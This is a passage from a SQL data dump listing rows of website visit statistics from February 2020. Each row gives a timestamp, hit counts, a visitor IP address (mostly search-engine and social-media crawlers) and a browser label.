1,0,0,'46.211.147.41','chrome'),(484430,1582601944,1,1,0,0,'178.154.171.134','other'),(484431,1582602028,1,1,0,0,'141.8.142.115','other'),(484432,1582602110,2,2,0,0,'66.249.64.26','chrome'),(484433,1582602164,1,1,0,0,'163.172.182.111','chrome'),(484434,1582602166,1,0,1,0,'207.46.13.22',''),(484435,1582602251,1,1,0,0,'66.249.64.27','chrome'),(484436,1582602391,1,1,0,0,'5.45.207.65','other'),(484437,1582602516,3,3,0,0,'207.46.13.230','other'),(484438,1582603243,1,1,0,0,'66.249.70.62','chrome'),(484439,1582603280,1,0,1,0,'157.55.39.240',''),(484440,1582603282,3,1,2,0,'157.55.39.240',''),(484441,1582603292,1,1,0,0,'66.249.64.28','chrome'),(484442,1582603464,1,1,0,0,'66.249.70.36','chrome'),(484443,1582604562,1,1,0,0,'66.249.70.36','chrome'),(484444,1582604840,1,1,0,0,'178.154.171.127','other'),(484445,1582604994,1,1,0,0,'66.249.64.28','chrome'),(484446,1582605002,1,1,0,0,'66.249.64.27','chrome'),(484447,1582605464,1,1,0,0,'66.249.70.62','chrome'),(484448,1582606058,3,3,0,0,'207.46.13.230','other'),(484449,1582606331,1,1,0,0,'141.8.183.53','other'),(484450,1582606459,2,2,0,0,'66.249.64.27','chrome'),(484451,1582606683,1,0,1,0,'207.46.13.12',''),(484452,1582608413,1,1,0,0,'8.29.198.27','other'),(484453,1582608543,1,1,0,0,'157.55.39.53','other'),(484454,1582608793,1,1,0,0,'66.249.64.27','chrome'),(484455,1582608912,1,1,0,0,'37.9.113.33','other'),(484456,1582609220,1,1,0,0,'62.205.134.182','other'),(484457,1582609432,1,1,0,0,'207.46.13.230','other'),(484458,1582609708,1,1,0,0,'5.45.207.49','other'),(484459,1582609857,1,1,0,0,'66.249.64.27','chrome'),(484460,1582610158,2,2,0,0,'66.249.64.26','chrome'),(484461,1582610678,1,1,0,0,'141.8.183.111','other'),(484462,1582610697,1,1,0,0,'141.8.183.33','other'),(484463,1582610946,1,1,0,0,'54.36.149.15','other'),(484464,1582610974,3,3,0,0,'66.249.64.27','chrome'),(484465,1582611077,1,1,0,0,'8.29.198.27','other'),(484466,1582611328,1,1,0,0,'141.8.142.115','other'),(484467,1582611496,2,2,0,0,'66.249.64.26','chrome'),(484468,1582611581,1,1,0,0,'37.9.113.163','other'),(484469,1582611968,1,1,0,0,'66.249.64.27','chrome'),(484470,1582612277,1,1,0,0,'66.249.64.28','chrome'),(484471,1582612442,1,1,0,0,'207.46.13.12','other'),(484472,1582612669,1,1,0,0,'66.249.64.26','chrome'),(484473,1582613201,1,1,0,0,'141.8.183.111','other'),(484474,1582613249,1,1,0,0,'91.196.178.76','chrome'),(484475,1582613577,1,1,0,0,'178.154.171.134','other'),(484476,1582613895,1,1,0,0,'93.94.66.0','chrome'),(484477,1582614079,2,2,0,0,'37.9.113.163','other'),(484478,1582614356,1,1,0,0,'47.15.140.34','chrome'),(484479,1582614493,1,1,0,0,'54.36.149.55','other'),(484480,1582614500,1,1,0,0,'66.249.70.36','chrome'),(484481,1582614947,1,1,0,0,'66.249.64.26','chrome'),(484482,1582615141,1,1,0,0,'95.108.181.104','other'),(484483,1582615315,3,3,0,0,'66.249.64.27','chrome'),(484484,1582615535,1,1,0,0,'88.155.213.159','chrome'),(484485,1582615770,1,1,0,0,'66.249.64.28','chrome'),(484486,1582616045,1,1,0,0,'66.249.64.26','chrome'),(484487,1582616869,1,1,0,0,'66.249.64.28','chrome'),(484488,1582616921,1,0,1,0,'66.249.70.62',''),(484489,1582617836,1,1,0,0,'54.36.149.44','other'),(484490,1582617959,1,1,0,0,'66.249.64.28','chrome'),(484491,1582618102,1,1,0,0,'141.8.142.161','other'),(484492,1582618444,2,2,0,0,'66.249.64.26','chrome'),(484493,1582618458,1,1,0,0,'54.36.149.15','other'),(484494,1582618501,1,1,0,0,'157.55.39.240','other'),(484495,1582618706,1,1,0,0,'141.8.132.12','other'),(484496,1582618839,1,1,0,0,'66.249.64.27','chrome'),(484497,1582618884,1,1,0,0,'37.9.113.33','other'),(484498,1582618978,2,2,0,0,'157.55.39.53','other'),(484499,1582619071,1,1,0,0,'207.46.13.12','other'),(484500,1582619369,1,1,0,0,'8.29.198.27','other'),(484501,1582620048,1,1,0,0,'91.196.177.15','firefox'),(484502,1582620168,1,1,0,0,'91.196.177.147','chrome'),(484503,1582620202,1,1,0,0,'77.111.244.245','chrome'),(484504,1582620389,1,1,0,0,'141.8.188.12','other'),(484505,1582621218,1,1,0,0,'157.55.39.53','other'),(484506,1582621257,1,1,0,0,'54.36.149.105','other'),(484507,1582621348,2,2,0,0,'157.55.39.240','other'),(484508,1582621641,1,1,0,0,'141.8.183.73','other'),(484509,1582621651,1,1,0,0,'141.8.183.15','other'),(484510,1582621726,1,1,0,0,'95.108.181.104','other'),(484511,1582622085,1,1,0,0,'8.29.198.25','other'),(484512,1582622966,3,3,0,0,'66.249.64.27','chrome'),(484513,1582623066,2,2,0,0,'31.13.127.20','other'),(484514,1582623068,1,1,0,0,'31.13.127.15','other'),(484515,1582623191,1,1,0,0,'3.136.233.183','chrome'),(484516,1582623224,1,1,0,0,'141.8.142.2','other'),(484517,1582623378,1,1,0,0,'66.249.70.62','chrome'),(484518,1582623876,1,1,0,0,'185.11.29.185','chrome'),(484519,1582624273,1,1,0,0,'91.196.178.184','chrome'),(484520,1582624470,2,2,0,0,'193.57.46.25','chrome'),(484521,1582624593,1,1,0,0,'141.8.142.161','other'),(484522,1582624863,2,2,0,0,'66.249.64.26','chrome'),(484523,1582624871,1,1,0,0,'66.249.64.27','chrome'),(484524,1582625021,1,1,0,0,'46.211.137.253','chrome'),(484525,1582626089,1,1,0,0,'54.36.149.74','other'),(484526,1582626673,2,2,0,0,'66.249.64.26','chrome'),(484527,1582626785,1,1,0,0,'66.249.70.36','chrome'),(484528,1582626921,1,1,0,0,'178.154.171.134','other'),(484529,1582627128,1,1,0,0,'66.249.64.27','chrome'),(484530,1582627154,1,1,0,0,'141.8.142.115','other'),(484531,1582627441,1,1,0,0,'141.8.183.100','other'),(484532,1582627730,1,1,0,0,'54.36.149.5','other'),(484533,1582628235,2,2,0,0,'66.249.64.28','chrome'),(484534,1582628346,1,1,0,0,'157.55.39.240','other'),(484535,1582628513,1,1,0,0,'54.36.149.96','other'),(484536,1582628803,1,1,0,0,'141.8.183.33','other'),(484537,1582628961,1,1,0,0,'178.154.171.127','other'),(484538,1582629066,1,1,0,0,'141.8.183.15','other'),(484539,1582629270,1,1,0,0,'5.45.207.49','other'),(484540,1582629563,1,1,0,0,'54.36.149.37','other'),(484541,1582629655,1,1,0,0,'66.249.64.28','chrome'),(484542,1582629784,1,1,0,0,'109.74.154.72','chrome'),(484543,1582630035,3,3,0,0,'193.17.44.18','chrome'),(484544,1582630400,1,1,0,0,'8.29.198.25','other'),(484545,1582630455,2,2,0,0,'207.46.13.12','other'),(484546,1582630463,1,1,0,0,'66.249.64.27','chrome'),(484547,1582630761,1,1,0,0,'141.8.132.2','other'),(484548,1582630764,1,1,0,0,'141.8.132.9','other'),(484549,1582630889,1,1,0,0,'54.36.149.43','other'),(484550,1582630895,1,1,0,0,'37.9.113.177','other'),(484551,1582631499,1,1,0,0,'54.36.149.98','other'),(484552,1582631582,1,1,0,0,'207.46.13.12','other'),(484553,1582631610,1,1,0,0,'141.8.132.12','other'),(484554,1582631938,1,1,0,0,'66.249.64.28','chrome'),(484555,1582632241,1,1,0,0,'37.9.113.10','other'),(484556,1582632836,1,0,1,0,'157.55.39.240',''),(484557,1582633141,1,1,0,0,'8.29.198.25','other'),(484558,1582634521,3,3,0,0,'157.55.39.87','other'),(484559,1582634789,1,1,0,0,'66.249.64.27','chrome'),(484560,1582634962,1,1,0,0,'54.36.149.103','other'),(484561,1582635069,1,1,0,0,'37.73.216.131','chrome'),(484562,1582635175,1,1,0,0,'66.249.70.36','chrome'),(484563,1582635965,1,1,0,0,'66.249.64.27','chrome'),(484564,1582636118,1,1,0,0,'141.8.183.100','other'),(484565,1582636180,1,1,0,0,'212.90.63.57','chrome'),(484566,1582636278,1,1,0,0,'95.108.213.55','other'),(484567,1582636532,1,1,0,0,'66.249.64.26','chrome'),(484568,1582636974,1,1,0,0,'141.8.142.119','other'),(484569,1582637006,1,1,0,0,'141.8.142.177','other'),(484570,1582637420,2,2,0,0,'31.13.127.12','other'),(484571,1582637421,1,1,0,0,'31.13.127.5','other'),(484572,1582637860,1,1,0,0,'37.9.113.177','other'),(484573,1582637980,1,1,0,0,'141.8.183.33','other'),(484574,1582638393,1,1,0,0,'66.249.64.28','chrome'),(484575,1582638463,1,1,0,0,'66.249.64.27','chrome'),(484576,1582638753,1,1,0,0,'213.108.44.26','chrome'),(484577,1582639518,2,2,0,0,'66.249.64.27','chrome'),(484578,1582639604,1,1,0,0,'91.196.178.76','chrome'),(484579,1582639846,1,1,0,0,'54.36.149.39','other'),(484580,1582640162,1,1,0,0,'141.8.132.37','other'),(484581,1582640253,1,1,0,0,'78.111.186.31','chrome'),(484582,1582640505,1,1,0,0,'141.8.183.53','other'),(484583,1582640520,1,1,0,0,'141.8.183.100','other'),(484584,1582640560,1,1,0,0,'91.196.178.76','chrome'),(484585,1582641034,1,1,0,0,'157.55.39.87','other'),(484586,1582641038,1,1,0,0,'207.46.13.12','other'),(484587,1582641194,1,1,0,0,'209.17.96.146','other'),(484588,1582641563,1,1,0,0,'8.29.198.27','other'),(484589,1582641624,1,1,0,0,'54.36.149.106','other'),(484590,1582641812,1,1,0,0,'91.196.177.46','chrome'),(484591,1582642419,1,1,0,0,'141.8.142.161','other'),(484592,1582643142,1,1,0,0,'157.55.39.87','other'),(484593,1582643282,1,1,0,0,'66.249.64.27','chrome'),(484594,1582643691,1,1,0,0,'141.8.142.177','other'),(484595,1582643761,2,2,0,0,'92.112.125.177','chrome'),(484596,1582643788,1,1,0,0,'157.55.39.240','other'),(484597,1582644229,1,1,0,0,'66.249.70.36','chrome'),(484598,1582644282,1,1,0,0,'8.29.198.25','other'),(484599,1582644879,1,0,1,0,'157.55.39.240',''),(484600,1582644890,1,1,0,0,'141.8.142.50','other'),(484601,1582645369,1,1,0,0,'207.46.13.12','other'),(484602,1582645518,2,2,0,0,'193.19.152.86','chrome'),(484603,1582645521,1,1,0,0,'141.8.183.53','other'),(484604,1582645533,1,1,0,0,'66.249.64.26','chrome'),(484605,1582645960,1,1,0,0,'91.196.178.108','chrome'),(484606,1582646361,1,1,0,0,'137.226.113.21','firefox'),(484607,1582646448,1,1,0,0,'141.8.142.115','other'),(484608,1582646464,2,2,0,0,'95.135.213.215','chrome'),(484609,1582647858,1,1,0,0,'91.196.178.150','chrome'),(484610,1582648397,2,2,0,0,'91.196.178.157','chrome'),(484611,1582650053,1,1,0,0,'141.8.142.177','other'),(484612,1582650096,1,1,0,0,'141.8.132.2','other'),(484613,1582650646,1,1,0,0,'66.249.64.28','chrome'),(484614,1582650796,1,1,0,0,'141.8.183.15','other'),(484615,1582650987,1,1,0,0,'178.154.171.66','other'),(484616,1582651039,1,1,0,0,'207.46.13.12','other'),(484617,1582651584,1,1,0,0,'66.249.64.26','chrome'),(484618,1582652338,2,2,0,0,'157.55.39.240','other'),(484619,1582652473,1,1,0,0,'66.249.64.28','chrome'),(484620,1582652510,107,107,0,0,'69.30.221.250','other'),(484621,1582652601,1,1,0,0,'8.29.198.27','other'),(484622,1582652862,1,1,0,0,'116.193.170.50','chrome'),(484623,1582653047,1,1,0,0,'207.46.13.12','other'),(484624,1582653086,1,1,0,0,'141.8.183.33','other'),(484625,1582653418,104,104,0,0,'69.30.221.250','other'),(484626,1582653717,1,0,1,0,'157.55.39.240',''),(484627,1582653755,1,1,0,0,'5.196.87.173','other'),(484628,1582653839,1,1,0,0,'141.8.132.12','other'),(484629,1582654135,1,1,0,0,'5.45.207.65','other'),(484630,1582654164,1,1,0,0,'141.8.132.37','other'),(484631,1582654246,1,1,0,0,'66.249.64.26','chrome'),(484632,1582654323,64,64,0,0,'69.30.221.250','other'),(484633,1582654665,1,1,0,0,'141.8.142.161','other'),(484634,1582655015,1,1,0,0,'141.8.142.2','other'),(484635,1582655127,1,1,0,0,'66.249.64.28','chrome'),(484636,1582655232,23,23,0,0,'69.30.221.250','other'),(484637,1582655418,1,1,0,0,'8.29.198.27','other'),(484638,1582655495,1,0,1,0,'157.55.39.240',''),(484639,1582656359,2,2,0,0,'207.46.13.12','other'),(484640,1582656412,1,1,0,0,'141.8.183.53','other'),(484641,1582657494,1,1,0,0,'66.249.70.62','chrome'),(484642,1582657873,1,1,0,0,'141.8.188.12','other'),(484643,1582657876,1,1,0,0,'5.45.207.65','other'),(484644,1582657879,1,1,0,0,'178.154.171.127','other'),(484645,1582658202,1,1,0,0,'173.252.83.21','other'),(484646,1582658203,1,1,0,0,'173.252.83.7','other'),(484648,1582658204,1,1,0,0,'173.252.83.10','other'),(484649,1582658514,3,3,0,0,'207.46.13.12','other'),(484650,1582658683,1,1,0,0,'157.55.39.240','other'),(484651,1582659262,1,1,0,0,'66.249.70.33','chrome'),(484652,1582659511,2,2,0,0,'95.108.181.104','other'),(484653,1582659740,1,1,0,0,'157.55.39.240','other'),(484654,1582660272,1,1,0,0,'207.46.13.12','other'),(484655,1582660703,1,1,0,0,'141.8.183.100','other'),(484656,1582661070,1,1,0,0,'178.154.171.66','other'),(484657,1582661090,1,1,0,0,'66.249.64.27','chrome'),(484658,1582661528,1,1,0,0,'66.249.64.26','chrome'),(484659,1582661603,1,1,0,0,'141.8.142.115','other'),(484660,1582662446,1,1,0,0,'66.249.64.28','chrome'),(484661,1582663119,1,1,0,0,'141.8.188.12','other'),(484662,1582663211,63,63,0,0,'185.230.242.3','other'),(484663,1582663605,1,1,0,0,'8.29.198.26','other'),(484664,1582663711,1,1,0,0,'141.8.142.50','other'),(484665,1582664156,10,10,0,0,'185.230.242.3','other'),(484666,1582664380,1,1,0,0,'95.47.150.82','chrome'),(484667,1582664588,1,0,1,0,'157.55.39.240',''),(484668,1582664895,1,1,0,0,'37.9.113.33','other'),(484669,1582665431,1,1,0,0,'141.8.183.15','other'),(484670,1582666363,1,1,0,0,'207.46.13.222','other'),(484671,1582666421,1,1,0,0,'66.249.70.33','chrome'),(484672,1582666468,1,1,0,0,'8.29.198.26','other'),(484673,1582666568,1,1,0,0,'66.249.64.28','chrome'),(484674,1582667233,1,1,0,0,'141.8.142.115','other'),(484675,1582667446,1,1,0,0,'54.36.149.63','other'),(484676,1582667448,1,1,0,0,'207.46.13.222','other'),(484677,1582668657,1,1,0,0,'54.36.149.46','other'),(484678,1582668722,1,1,0,0,'54.202.93.65','chrome'),(484679,1582669322,1,1,0,0,'66.249.70.62','chrome'),(484680,1582669731,1,1,0,0,'37.9.113.33','other'),(484681,1582669785,2,2,0,0,'207.46.13.222','other'),(484682,1582669873,1,1,0,0,'66.249.64.28','chrome'),(484683,1582669942,1,1,0,0,'141.8.183.111','other'),(484684,1582670230,1,1,0,0,'207.46.13.12','other'),(484685,1582670636,1,1,0,0,'37.9.113.163','other'),(484686,1582671866,1,1,0,0,'207.46.13.12','other'),(484687,1582672024,1,1,0,0,'137.226.113.21','firefox'),(484688,1582672371,1,1,0,0,'66.249.64.26','chrome'),(484689,1582672436,1,1,0,0,'141.8.183.111','other'),(484690,1582672751,1,1,0,0,'54.36.149.13','other'),(484691,1582672998,1,1,0,0,'207.46.13.222','other'),(484692,1582673345,1,1,0,0,'54.36.149.56','other'),(484693,1582673586,1,1,0,0,'5.45.207.65','other'),(484694,1582674589,1,1,0,0,'8.29.198.26','other'),(484695,1582674679,2,2,0,0,'141.8.183.73','other'),(484696,1582674884,1,1,0,0,'141.8.183.53','other'),(484697,1582675447,1,1,0,0,'207.46.13.222','other'),(484698,1582675830,1,1,0,0,'141.8.188.25','other'),(484699,1582675832,1,1,0,0,'141.8.183.33','other'),(484700,1582676137,1,1,0,0,'37.9.113.177','other'),(484701,1582676154,1,1,0,0,'66.249.64.27','chrome'),(484702,1582676585,1,0,1,0,'157.55.39.240',''),(484703,1582676936,1,1,0,0,'66.249.64.26','chrome'),(484704,1582676942,1,1,0,0,'141.8.142.119','other'),(484705,1582677157,1,1,0,0,'141.8.142.164','other'),(484706,1582677271,1,1,0,0,'66.249.64.28','chrome'),(484707,1582677519,1,1,0,0,'8.29.198.27','other'),(484708,1582677679,1,1,0,0,'37.9.113.33','other'),(484709,1582678514,1,1,0,0,'62.205.134.182','other'),(484710,1582678761,1,1,0,0,'141.8.132.37','other'),(484711,1582679012,2,2,0,0,'66.249.64.27','chrome'),(484712,1582679507,1,1,0,0,'157.55.39.240','other'),(484713,1582679623,1,1,0,0,'91.209.11.236','other'),(484714,1582680009,2,2,0,0,'207.46.13.12','other'),(484715,1582680111,1,1,0,0,'37.9.113.10','other'),(484716,1582680700,1,0,1,0,'207.46.13.222',''),(484717,1582680821,1,1,0,0,'37.9.113.177','other'),(484718,1582681511,1,1,0,0,'37.9.113.10','other'),(484719,1582682605,2,2,0,0,'207.46.13.222','other'),(484720,1582683325,1,1,0,0,'141.8.188.12','other'),(484721,1582683418,1,1,0,0,'66.249.64.27','chrome'),(484722,1582683850,1,1,0,0,'95.108.213.55','other'),(484723,1582684154,1,1,0,0,'37.9.113.163','other'),(484724,1582684641,1,1,0,0,'141.8.142.161','other'),(484725,1582684713,1,1,0,0,'66.249.64.28','chrome'),(484726,1582684961,1,1,0,0,'141.8.183.73','other'),(484727,1582685208,1,1,0,0,'157.55.39.240','other'),(484728,1582685394,1,1,0,0,'37.9.113.10','other'),(484729,1582685581,1,1,0,0,'8.29.198.26','other'),(484730,1582685730,1,1,0,0,'207.46.13.12','other'),(484731,1582685845,1,1,0,0,'46.211.134.126','chrome'),(484732,1582686001,1,1,0,0,'141.8.142.164','other'),(484733,1582686146,1,1,0,0,'66.249.64.26','chrome'),(484734,1582686275,1,1,0,0,'66.249.64.27','chrome'),(484735,1582686335,1,1,0,0,'66.249.64.28','chrome'),(484736,1582686447,1,1,0,0,'66.249.70.33','chrome'),(484737,1582687069,1,1,0,0,'207.46.13.12','other'),(484738,1582687101,1,0,1,0,'157.55.39.240',''),(484739,1582687841,1,1,0,0,'157.55.39.240','other'),(484740,1582687871,1,1,0,0,'66.249.64.26','chrome'),(484741,1582687880,1,1,0,0,'207.46.13.222','other'),(484742,1582688438,1,1,0,0,'66.249.64.28','chrome'),(484743,1582688546,1,1,0,0,'8.29.198.26','other'),(484744,1582689414,1,1,0,0,'157.55.39.240','other'),(484745,1582689665,1,1,0,0,'66.249.70.33','chrome'),(484746,1582691141,1,1,0,0,'66.249.64.27','chrome'),(484747,1582691189,1,1,0,0,'66.249.64.26','chrome'),(484748,1582691556,1,1,0,0,'38.99.62.94','other'),(484749,1582692044,1,1,0,0,'157.55.39.240','other'),(484750,1582692214,1,1,0,0,'66.249.64.28','chrome'),(484751,1582692360,1,1,0,0,'66.249.64.27','chrome'),(484752,1582692747,1,1,0,0,'207.46.13.222','other'),(484753,1582692844,1,1,0,0,'66.249.70.62','chrome'),(484754,1582692892,1,1,0,0,'91.196.178.28','chrome'),(484755,1582693467,2,2,0,0,'66.249.64.28','chrome'),(484756,1582693638,1,1,0,0,'66.249.70.33','chrome'),(484757,1582694085,1,1,0,0,'66.249.64.27','chrome'),(484758,1582695131,1,1,0,0,'66.249.64.26','chrome'),(484759,1582695629,1,1,0,0,'66.249.70.36','chrome'),(484760,1582695689,2,2,0,0,'66.249.64.27','chrome'),(484761,1582695751,1,1,0,0,'62.205.134.182','other'),(484762,1582696015,1,1,0,0,'66.249.70.33','chrome'),(484763,1582696250,1,1,0,0,'66.249.64.26','chrome'),(484764,1582696552,1,1,0,0,'8.29.198.26','other'),(484765,1582697054,3,3,0,0,'66.249.64.28','chrome'),(484766,1582697281,1,1,0,0,'157.55.39.240','other'),(484767,1582697496,1,1,0,0,'66.249.64.27','chrome'),(484768,1582697505,1,0,1,0,'66.249.64.26',''),(484769,1582698379,1,1,0,0,'66.249.64.28','chrome'),(484770,1582698547,3,3,0,0,'66.249.64.26','chrome'),(484771,1582699173,1,1,0,0,'209.17.97.34','other'),(484772,1582699550,1,1,0,0,'8.29.198.25','other'),(484773,1582699715,1,0,1,0,'66.249.64.27',''),(484774,1582699775,1,0,1,0,'207.46.13.12',''),(484775,1582699826,3,3,0,0,'66.249.64.28','chrome'),(484776,1582700522,1,1,0,0,'157.55.39.249','other'),(484777,1582701138,1,1,0,0,'46.211.138.173','chrome'),(484778,1582701759,1,1,0,0,'138.246.253.5','chrome'),(484779,1582701900,1,1,0,0,'31.13.127.24','other'),(484780,1582701901,1,1,0,0,'31.13.127.12','other'),(484781,1582702325,1,1,0,0,'66.249.64.27','chrome'),(484782,1582702697,1,1,0,0,'193.28.177.244','chrome'),(484783,1582703537,1,0,1,0,'157.55.39.249',''),(484784,1582703668,1,1,0,0,'66.249.64.26','chrome'),(484785,1582704441,1,1,0,0,'66.249.64.28','chrome'),(484786,1582704503,1,1,0,0,'66.249.64.27','chrome'),(484787,1582705129,4,4,0,0,'207.46.13.12','other'),(484788,1582706066,1,1,0,0,'91.196.177.228','chrome'),(484789,1582706163,1,1,0,0,'46.133.150.27','other'),(484790,1582706404,1,1,0,0,'207.46.13.12','other'),(484791,1582707535,1,1,0,0,'8.29.198.27','other'),(484792,1582708293,1,1,0,0,'91.196.177.15','chrome'),(484793,1582709029,1,0,1,0,'66.249.64.28',''),(484794,1582709554,1,1,0,0,'66.249.64.26','chrome'),(484795,1582709819,1,1,0,0,'66.249.64.28','chrome'),(484796,1582709835,1,1,0,0,'66.249.64.27','chrome'),(484797,1582710632,1,1,0,0,'8.29.198.27','other'),(484798,1582710936,1,1,0,0,'176.103.56.200','chrome'),(484799,1582711057,2,2,0,0,'91.196.178.76','chrome'),(484800,1582711063,1,1,0,0,'185.15.4.115','chrome'),(484801,1582711267,1,1,0,0,'91.196.178.178','chrome'),(484802,1582711549,1,1,0,0,'18.222.6.7','chrome'),(484803,1582711562,1,1,0,0,'157.55.39.249','other'),(484804,1582711880,1,1,0,0,'66.249.64.28','chrome'),(484805,1582712121,1,1,0,0,'66.249.64.27','chrome'),(484806,1582712130,2,2,0,0,'66.249.64.26','chrome'),(484807,1582712237,1,1,0,0,'91.196.178.76','chrome'),(484808,1582712643,1,1,0,0,'46.211.150.6','chrome'),(484809,1582712801,1,1,0,0,'157.55.39.95','other'),(484810,1582714029,1,1,0,0,'66.249.64.26','chrome'),(484811,1582714108,1,1,0,0,'188.163.73.11','chrome'),(484812,1582714138,1,1,0,0,'178.154.171.134','other'),(484813,1582714821,2,2,0,0,'95.213.141.126','opera'),(484814,1582714942,2,1,1,0,'207.46.13.12',''),(484815,1582715498,1,1,0,0,'91.196.178.165','chrome'),(484816,1582715533,1,0,1,0,'157.55.39.249',''),(484817,1582715907,1,0,1,0,'157.55.39.95',''),(484818,1582716437,1,1,0,0,'109.74.154.72','chrome'),(484819,1582716783,1,1,0,0,'66.249.64.28','chrome'),(484820,1582717097,1,1,0,0,'46.133.69.93','chrome'),(484821,1582717137,1,1,0,0,'66.249.64.27','chrome'),(484822,1582717230,1,1,0,0,'66.249.70.36','chrome'),(484823,1582717394,1,1,0,0,'46.133.145.108','other'),(484824,1582717810,1,1,0,0,'66.249.64.28','chrome'),(484825,1582717970,1,1,0,0,'157.55.39.95','other'),(484826,1582718468,1,1,0,0,'8.29.198.27','other'),(484827,1582718605,2,2,0,0,'34.220.183.24','firefox'),(484828,1582718609,3,3,0,0,'34.220.183.24','chrome'),(484829,1582719521,1,1,0,0,'89.19.115.239','chrome'),(484830,1582719597,1,1,0,0,'207.46.13.12','other'),(484831,1582720432,1,1,0,0,'157.55.39.249','other'),(484832,1582720712,1,1,0,0,'91.196.178.76','firefox'),(484833,1582721659,1,1,0,0,'8.29.198.26','other'),(484834,1582722032,1,1,0,0,'207.46.13.12','other'),(484835,1582722381,1,1,0,0,'66.249.70.36','chrome'),(484836,1582723512,1,1,0,0,'77.111.244.222','chrome'),(484837,1582723741,1,1,0,0,'66.249.64.27','chrome'),(484838,1582723800,3,3,0,0,'207.46.13.12','other'),(484839,1582723887,1,1,0,0,'157.55.39.95','other'),(484840,1582724462,2,2,0,0,'157.55.39.249','other'),(484841,1582724906,1,1,0,0,'157.55.39.138','other'),(484842,1582725210,1,1,0,0,'91.196.178.72','chrome'),(484843,1582725211,1,1,0,0,'91.196.178.76','chrome'),(484844,1582726034,1,0,1,0,'157.55.39.249',''),(484845,1582726180,2,2,0,0,'66.249.64.27','chrome'),(484846,1582726455,1,1,0,0,'46.211.136.148','chrome'),(484847,1582726940,1,1,0,0,'94.153.99.225','chrome'),(484848,1582726942,1,1,0,0,'66.102.8.90','chrome'),(484849,1582726949,1,1,0,0,'66.249.83.197','chrome'),(484850,1582726950,1,1,0,0,'66.249.80.63','chrome'),(484851,1582727113,1,1,0,0,'157.55.39.95','other'),(484852,1582727597,1,1,0,0,'66.249.70.36','chrome'),(484853,1582727774,1,1,0,0,'66.249.64.26','chrome'),(484854,1582728209,1,1,0,0,'66.249.64.27','chrome'),(484855,1582728686,2,2,0,0,'66.249.64.28','chrome'),(484856,1582729471,2,2,0,0,'128.124.33.7','chrome'),(484857,1582729477,1,1,0,0,'8.29.198.25','other'),(484858,1582729556,1,1,0,0,'91.196.178.73','chrome'),(484859,1582730179,1,0,1,0,'157.55.39.95',''),(484860,1582730218,1,1,0,0,'91.196.178.55','chrome'),(484861,1582730555,1,1,0,0,'66.249.64.27','chrome'),(484862,1582730848,1,1,0,0,'157.55.39.95','other'),(484863,1582731421,1,1,0,0,'66.249.64.28','chrome'),(484864,1582732147,1,1,0,0,'66.249.70.62','chrome'),(484865,1582732539,2,2,0,0,'66.249.64.26','chrome'),(484866,1582732709,1,1,0,0,'157.55.39.249','other'),(484867,1582732900,1,1,0,0,'8.29.198.26','other'),(484868,1582733990,1,1,0,0,'66.249.64.27','chrome'),(484869,1582734211,1,1,0,0,'66.249.64.26','chrome'),(484870,1582734921,1,1,0,0,'91.196.178.73','firefox'),(484871,1582735293,1,1,0,0,'66.249.64.28','chrome'),(484872,1582735816,1,1,0,0,'157.55.39.249','other'),(484873,1582738381,1,1,0,0,'91.196.178.1','chrome'),(484874,1582738383,1,1,0,0,'66.249.70.62','chrome'),(484875,1582738618,1,0,1,0,'157.55.39.249',''),(484876,1582738649,1,1,0,0,'66.249.64.27','chrome'),(484877,1582738841,1,1,0,0,'207.46.13.12','other'),(484878,1582739258,1,1,0,0,'128.124.93.29','chrome'),(484879,1582739610,1,1,0,0,'66.249.64.26','chrome'),(484880,1582739619,1,1,0,0,'66.249.70.33','chrome'),(484881,1582740503,1,1,0,0,'8.29.198.27','other'),(484882,1582741932,1,1,0,0,'91.196.178.1','chrome'),(484883,1582742030,1,1,0,0,'66.249.64.27','chrome'),(484884,1582742082,1,1,0,0,'66.249.64.28','chrome'),(484885,1582742279,1,1,0,0,'66.249.64.26','chrome'),(484886,1582742969,1,0,1,0,'157.55.39.95',''),(484887,1582743094,1,1,0,0,'157.55.39.249','other'),(484888,1582743159,1,1,0,0,'207.46.13.12','other'),(484889,1582743277,1,1,0,0,'66.249.64.27','chrome'),(484890,1582743318,2,2,0,0,'66.249.70.62','chrome'),(484891,1582743952,2,2,0,0,'66.249.64.28','chrome'),(484892,1582744006,1,1,0,0,'8.29.198.26','other'),(484893,1582744013,1,1,0,0,'31.13.127.2','other'),(484894,1582744014,1,1,0,0,'31.13.127.12','other'),(484898,1582744210,1,1,0,0,'66.249.64.27','chrome'),(484899,1582744305,1,1,0,0,'66.249.64.26','chrome'),(484900,1582744519,1,1,0,0,'173.252.83.6','other'),(484901,1582744520,1,1,0,0,'173.252.83.22','other'),(484905,1582744595,1,1,0,0,'173.252.83.18','other'),(484906,1582744596,1,1,0,0,'173.252.83.12','other'),(484910,1582745463,2,2,0,0,'66.249.64.28','chrome'),(484911,1582745520,1,0,1,0,'207.46.13.12',''),(484912,1582745917,1,0,1,0,'157.55.39.95',''),(484913,1582746606,1,1,0,0,'207.46.13.12','other'),(484914,1582746819,1,1,0,0,'66.249.64.27','chrome'),(484915,1582747909,1,1,0,0,'66.249.70.62','chrome'),(484916,1582748005,1,1,0,0,'66.249.64.28','chrome'),(484917,1582748351,1,1,0,0,'207.46.13.12','other'),(484918,1582748442,1,1,0,0,'66.249.64.27','chrome'),(484919,1582748682,1,1,0,0,'164.132.202.92','firefox'),(484920,1582748847,1,0,1,0,'157.55.39.95',''),(484921,1582748930,2,2,0,0,'66.249.64.26','chrome'),(484922,1582748994,3,3,0,0,'173.252.83.5','other'),(484923,1582748995,3,3,0,0,'173.252.83.6','other'),(484930,1582748997,4,4,0,0,'173.252.83.10','other'),(484931,1582748996,3,3,0,0,'173.252.83.15','other'),(484942,1582748999,1,1,0,0,'173.252.83.17','other'),(484943,1582748998,1,1,0,0,'173.252.83.17','other'),(484945,1582749000,1,1,0,0,'173.252.83.13','other'),(484946,1582749004,1,1,0,0,'46.211.142.204','chrome'),(484947,1582749721,1,1,0,0,'66.249.64.28','chrome'),(484948,1582749762,1,1,0,0,'66.249.64.27','chrome'),(484949,1582751213,1,1,0,0,'66.249.64.28','chrome'),(484950,1582751492,1,1,0,0,'8.29.198.25','other'),(484951,1582752937,4,4,0,0,'66.249.64.26','chrome'),(484952,1582753250,1,1,0,0,'207.46.13.12','other'),(484953,1582753734,1,1,0,0,'157.55.39.249','other'),(484954,1582754398,1,1,0,0,'91.209.11.236','other'),(484955,1582755121,1,1,0,0,'8.29.198.26','other'),(484956,1582755186,1,1,0,0,'66.249.64.26','chrome'),(484957,1582755561,1,1,0,0,'157.55.39.95','other'),(484958,1582755661,1,0,1,0,'157.55.39.249',''),(484959,1582756104,1,1,0